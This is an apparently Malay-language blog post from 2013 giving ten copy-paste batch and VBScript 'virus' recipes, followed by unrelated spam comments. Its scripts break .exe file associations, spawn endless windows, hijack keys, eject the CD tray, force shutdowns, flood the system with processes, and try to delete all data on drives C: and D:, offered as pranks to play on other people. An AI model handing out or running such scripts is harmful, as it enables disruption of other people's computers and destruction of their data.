Warung Bebas

Tuesday, 2 July 2013

10Tips Cara2 Membuat Virus Menggunakan Notepad dan CMD

10Tips Cara-Cara Membuat Virus Menggunakan Notepad dan CMD

Cara Membuat Virus Menggunakan Notepad dan CMD - . Virus ini boleh digunakan untuk mengajar seseorang dan ada juga yang cukup berbahaya, saya share ini hanya sekedar ingin berkongsi pengetahuan kpd kawan2 semua, siapa tau berguna dan bermanfaat bagi kamu dan supaya kamu semua tau yang notepad dan cmd  asalnya dari windows boleh digunakan untuk membuat virus. ok mulakan...!!!!

1. Saya akan terangkan cara membuat virus menggunakan CMD : Buka program cmd , dgn klik start - run - taip cmd atau boleh gunakan keyboard dengan menekan key windows + R lalu tekan cmd dan dan tekan enter lalu taip script berikut di cmd "ASSOC.exe=.hank" and than tekan enter!!. ini membuat program/aplikasi yang berkerja .exe tidak berjalan, seperti game, dll. Tapi relax, yg ni boleh dikembalikan seperti sediakala dengan cara buka cmd, lalu taip "ASSOC.exe=EXEFILE" tips ini boleh mengajar someone. cuma takut2kan diorang saje..hahaha



2. Sekarang saya akan ajar kamu cara2 membuat virus menggunakan Notepad : Buka notepad dgn klik start - all programs - accessories - notepad kemudian taip kode script berikut ke notepad : 
------
_______________________________________________
start

start

start

start

start

start

start

start

start

start

start

start
_________________________________________________________
------
seterusnya simpan di notepad dgn nama ape saje dgn formatnya ditukar .bat contoh : "virus.bat" dan Save As Type tukar menjadi All Files. Trik ni buat komputer anda menjadi eror, karena akan membuka CMD open secara banyak jikalau file "eror.bat"  itu di open.

3. buka notepad, now saya akan ajar cara membuat notepad terbuka secara tak terhenti, HoHoHo.... copy paste code arahan bawah tu ke notepad :
_________________________________________________________

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
__________________________________________________________
Simpan di notepad dengan nama pape pon dgn formatnya .bat samalah macam yang tadi punya, contoh "ape2.bat" and than Save As Type tukar jadi All Files. Trik ini akan membuatkan notepad anda terbuka dengan sendirinye tanpa henti.. takutnyeee..haha

4. buka lagi notepad,(boOOringnya), now cara membuat tombol backspace menjadi eror dia akan menekan terus-menerus tanpa henti2, terus je copy paste code script bawah ni ke notepad : 
_____________________________________________________

MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
_____________________________________________________
Simpan kode script tersebut di notepad dengan nama pape je  yang penting tidak forget menuliskan format .vbs contoh : "eror.vbs" and than Save As Type tukar jadi Al Files. tips ini membuatkan tombol backspace jadi eror dan menekan dgn sendiri tampa perlu di tekan.

5. buka lagi notepad, tips ini boleh membuat CD/DVD Room buka tutup dengan sendirinya, terus je copypaste code script bawah tu ke notepad : 
_________________________________________________
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
_________________________________________________
Simpan code tersebut di notepad dgn nama pape pon dan tambahkan .vbs contoh : "eror.vbs" dan Save As Type tukar menjadi All Files, lepas itu akan membuatkan CD/DVD Room terbuka dan tutup dengan sendiri secara aggressive.




6. Tips kali ni boleh buat Caps Lock menyala tanpa henti tanpa di tekan, terus je copypaste code script bawah tu di notepad : 
______________________________________________________________
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
_______________________________________________________________
Simpan code script tersebut dengan nama pape pon dengan berformat .vbs contoh "eror.vbs" dan Save As Type tukar menjadi All Files, jika File ini di buka akan buat Caps Lock menyala tanpa henti.

7. Tips yang ke tujuh, membuat komputer anda menjadi autoshoutdown dengan kata lain dead pc,  copypaste script bawah ni ke notepad : 
__________________________________________
@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s
__________________________________________
Simpan code script tersebut dengan nama bebas dan dgn format .vbs contoh "mati.vbs" dan Save As Type tukar menjadi All Files, and than jika file ini di buka akan membuat komputer autoshoutdown atau mati.

8. Tips yang ini sama dengan tips yang no7 hanya perlu waktu untuk autoshutdown, copypaste code bawah tu ke notepad : 
________________________________
@echo shutdown -s -t 1 -f 
________________________________
Simpan kode script tersebut dengan nama ape ape pon dan dengan brformat .bat lain dengan trik yang no 7, contoh : "pape.bat" tanpa tanda kutip dan Save As Type tukar menjadi All Files, kalau file ini dibuka akan sama dengan no 7 iaakan membuat komputer AutoShoutdown, hanya yang membezakannya adalah yang ni punya waktu, tengok angka pada code script tersebut yang berwarna hijau, yang tu adalah waktu yang diperlukan untuk mematikan sesebuah komputer, boleh menukar masa sesuai dgn keinginan anda (1 = 1 detik/saat)

9. Kali ini tips yang berbahaya, karena komputer akan dipenuhi oleh 100000000  (huyooo!!)

tourstart yang akan memenuhi monitor dan akan membuat komputer menjadi hang,(wow takutnyee!!)  
untuk cara atasinya delete saje semua tourstart tersebut atau restart PC/LEPTOP. copypaste code script bawah ni ke notepad : 
________________________________________________
option explicit 
dim wshshell 
set wshshell=wscript.createobject(“wscript.shell”) 
dim x 
for x = 1 to 100000000 
wshshell.run “tourstart.exe” 
next
________________________________________________
Simpan dengan nama pape pon dan dgn format .vbs contoh : "1000000.vbs" and than Save As type change menjadi All Files. Pada angka yang saya letak warna hijau, dan boleh di tukar sesuai dgn kemahuan anda, boleh ditukar menjadi 100 atau 1000, dan kalau file ini dibuka ia akan membuat tourstart sesuai dgn angka yang ditaip pada code tesebut,

10. dan Yang terakhir skali, yang ni paling berbayaha, karena dpt menghapuskan semua data di hardisk tanpa ada terkecuali, sehingga nak ke tak nak, mesti install berkali2x, terus saje copypaste code script bawah ni ke notepad : 
___________________________
@echo off
DEL C: -Y
DEL D: -Y
___________________________
Simpan dengan nama bebas dan exstensi .bat contoh "mampus.bat"  and than Save As Type tukar mnjadi All Files and than simpan , tapi ingat!! JANGAN KLIK karena boleh menyebabkan terpadam semua data dalam komputer anda.


Oke..itu saje beberapa  Cara2 Membuat Virus Menggunakan Notepad dan CMD  untuk  digunakan dengan baik(baik lah sangattt!!!), dan supaya kamu dapat berhati-hati jikalau melihat ada file di komputer kamu yang berformat .bat atau .vbs siapa tahu ada udang disebalik menara berkembar petronas hahaha(lawak lah sangatt!!!)...




5 comments em “ 10Tips Cara2 Membuat Virus Menggunakan Notepad dan CMD”

  • 6 March 2021 at 02:30
    haseeb Disse:

    Norton.com/setup,If you have recently purchased a Norton Com Setup Product from an online store or a retail store.

    Users can activate Roku from the official URL roku.com/link

    WWW Office.com/setup. You will get a complete Office Com Setup guide. You just need to follow our complete guideline regarding Office.com/setup.

    delete
  • 7 May 2022 at 02:25
    colinfarrell2 Disse:

    Interstate moves tend to be Long Distance Moving more in-depth moves than local moves. Generally speaking, an interstate move is any move that crosses state lines. This means that, even if the move is going just a few miles but is in another state, then it is considered an interstate move. Interstate moves fall under federal regulations and as a result typically cost more than a local move. Be wary of local movers who claim they do interstate moves and make sure they have the proper licenses and insurances to do so.

    delete
  • 11 May 2022 at 03:43
    adrienbrody74 Disse:

    With packages such as Google Fonts and Typekit collectively Fontastic offering thousands of different fonts, there is almost a countless amount options for choosing the right font for your specific project. However, you’re still only limited to selecting a font that someone else has created. There are various motivations for wanting to create your own font, and similarly lots of options for doing so.

    delete
  • 12 May 2022 at 11:12

    You can also download gif images of pinterest along with pinterest video download videos from pinterest website and pinterest app.On pinterest's website, there are gifs along with videos, images.Just like pinterest does not give any link option to download the video. Likewise, pinterest does not give any link option to download gif. If you want to download pinterest video as well as gif. So you can download pinterest gif with the help of this tool.

    delete
  • 14 May 2022 at 07:45

    There’s no denying that video marketing has YtFame been on the rise over the past few years, growing ever more popular and accessible for brands. While popular sites such as TikTok, Facebook and Instagram and your website are great places to invest, creating a YouTube channel might be the best place to promote your brand as individuals spend one billion hours each day watching videos on this platform.

    delete

Post a Comment

 

Berat 66.com . .!!!!!!! Copyright © 2012 Fast Loading -- Powered by Blogger